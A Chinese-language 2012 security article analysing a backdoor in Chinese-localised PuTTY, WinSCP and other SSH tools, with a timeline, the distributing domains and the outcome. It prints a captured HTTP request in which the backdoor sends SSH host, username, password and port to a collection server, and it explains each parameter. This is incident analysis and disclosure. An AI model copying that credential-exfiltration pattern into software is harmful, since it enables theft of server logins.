中文版putty后門事件分析

kaduo521

　　近日，中文版putty等SSH遠(yuǎn)程管理工具被曝出存在后門，該后門會(huì)自動(dòng)竊取管理員所輸入的SSH用戶名與口令，并將其發(fā)送至指定服務(wù)器上。根據(jù)分析，此次事件涉及到來(lái)自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站點(diǎn)的中文版putty、WinSCP、SSHSecure和sftp等軟件，而這些軟件的英文版本不受影響。

　　事件回放：

　　1月25日：新浪微博有網(wǎng)友發(fā)布消息稱putty和winscp中裝有后門程序，但該條微博并未提及后門程序的類型及其技術(shù)細(xì)節(jié)，而且消息也未被過(guò)多的人所重視，目前無(wú)法確定該條微博是否與此次事件有關(guān)聯(lián)：

　　1月30日下午16點(diǎn)左右：互聯(lián)網(wǎng)上再度出現(xiàn)關(guān)于中文版putty等SSH管理軟件被裝有后門的消息，并且此消息對(duì)后門的行為特征進(jìn)行了簡(jiǎn)要的描述 —— 該程序會(huì)導(dǎo)致root密碼丟失，但發(fā)布者仍未披露具體的技術(shù)細(xì)節(jié)：

　　以上微博的短URL所對(duì)應(yīng)的文章截圖如下：

　　1月31日：經(jīng)過(guò)一晚的醞釀，putty事件開(kāi)始在互聯(lián)網(wǎng)上廣泛傳播，微博、論壇等信息發(fā)布平臺(tái)上開(kāi)始大量出現(xiàn)putty后門事件的消息，同時(shí)，很多技術(shù)人員也開(kāi)始對(duì)含有后門的putty等SSH管理軟件進(jìn)行技術(shù)分析，并陸續(xù)發(fā)布其中的技術(shù)細(xì)節(jié)。

　　事件分析：

　　1、問(wèn)題軟件源頭

　　據(jù)知道創(chuàng)宇安全研究團(tuán)隊(duì)對(duì)putty等軟件的跟蹤分析發(fā)現(xiàn)，來(lái)自以下幾個(gè)站點(diǎn)的中文版putty、WinSCP、SSHSecure和sftp等軟件都可能存在后門程序：
http://www.putty.org.cn
http://www.putty.ws
http://www.winscp.cc
http://www.sshsecure.com

　　2、行為分析

　　網(wǎng)絡(luò)行為分析
　　使用帶有后門程序的中文版putty等SSH管理軟件連接服務(wù)器時(shí)，程序會(huì)自動(dòng)記錄登錄時(shí)的用戶名、密碼和服務(wù)器IP地址等信息，并會(huì)以HTTP的方式將這些信息發(fā)送到指定的服務(wù)器上，以下是在分析過(guò)程中抓取到的原始HTTP數(shù)據(jù)：
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip-163.com:88
Pragma: no-cache

　　從以上數(shù)據(jù)可以獲得以下信息：
　　1. 敏感信息通過(guò)HTTP GET的方式發(fā)送到服務(wù)器l.ip-163.com上(經(jīng)測(cè)試，該域名與putty.org.cn位于同一IP地址上)
　　2. 用于收集密碼的程序地址為http:// l.ip-163.com:88/yj33/js2.asp
　　3. 敏感信息以GET參數(shù)的方式發(fā)送到服務(wù)器上，相關(guān)參數(shù)為：
　　act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
　　每個(gè)字段的作用如下：
　　　　• act為執(zhí)行的動(dòng)作，參數(shù)add用于添加信息，經(jīng)測(cè)試，也可使用del來(lái)刪除信息
　　　　• user為SSH服務(wù)器的IP地址，此處為50.23.79.188
　　　　• pwd為連接服務(wù)器時(shí)的登錄用戶名，此處為abc
　　　　• ll1為登錄密碼，此處為pass
　　　　• ll2為目標(biāo)服務(wù)器的SSH端口，此處為22(即，默認(rèn)端口)
　　　　• ll3則為客戶端類型，此處為PuTTY
　　服務(wù)器本地文件分析
　　知道創(chuàng)宇安全研究團(tuán)隊(duì)借助文件完整性校驗(yàn)的方式，對(duì)服務(wù)器初始安全狀態(tài)下的/etc、/lib、/usr、/bin等敏感目錄進(jìn)行了完整性備份，并在putty連接測(cè)試后對(duì)這些目錄的文件變更、丟失和添加等情況進(jìn)行了校驗(yàn)，校驗(yàn)結(jié)果顯示，中文版putty并未對(duì)服務(wù)器自動(dòng)安裝后門程序。
　　網(wǎng)絡(luò)上部分消息稱，有些使用中文版putty進(jìn)行過(guò)遠(yuǎn)程管理的服務(wù)器上出現(xiàn)惡意代碼和文件，可能是由于惡意用戶獲取了putty所收集的密碼后人為植入所致。

　　3、事件后續(xù)

　　截止至2月1日，在本次事件中所涉及的以下域名均已不能訪問(wèn)：
http://www.putty.org.cn
http://putty.ws
http://www.winscp.cc
http://www.sshsecure.com
http://l.ip-163.com:88

　　但是，在1月31日晚，網(wǎng)絡(luò)上傳出“l(fā).ip-163.com被黑”的消息并配有一張“受害者列表”的截圖：

　　而就在此消息發(fā)布不久之后，互聯(lián)網(wǎng)上便出現(xiàn)了完整的受害者列表供所有用戶瀏覽和下載，根據(jù)這份來(lái)自互聯(lián)網(wǎng)列表的顯示，不但有眾多政府網(wǎng)站位列其中，IBM、Oracle、HP等大廠商的服務(wù)器也出現(xiàn)在列表內(nèi)。

　　原文鏈接：http://safe.it168.com/a2012/0201/1305/000001305829.shtml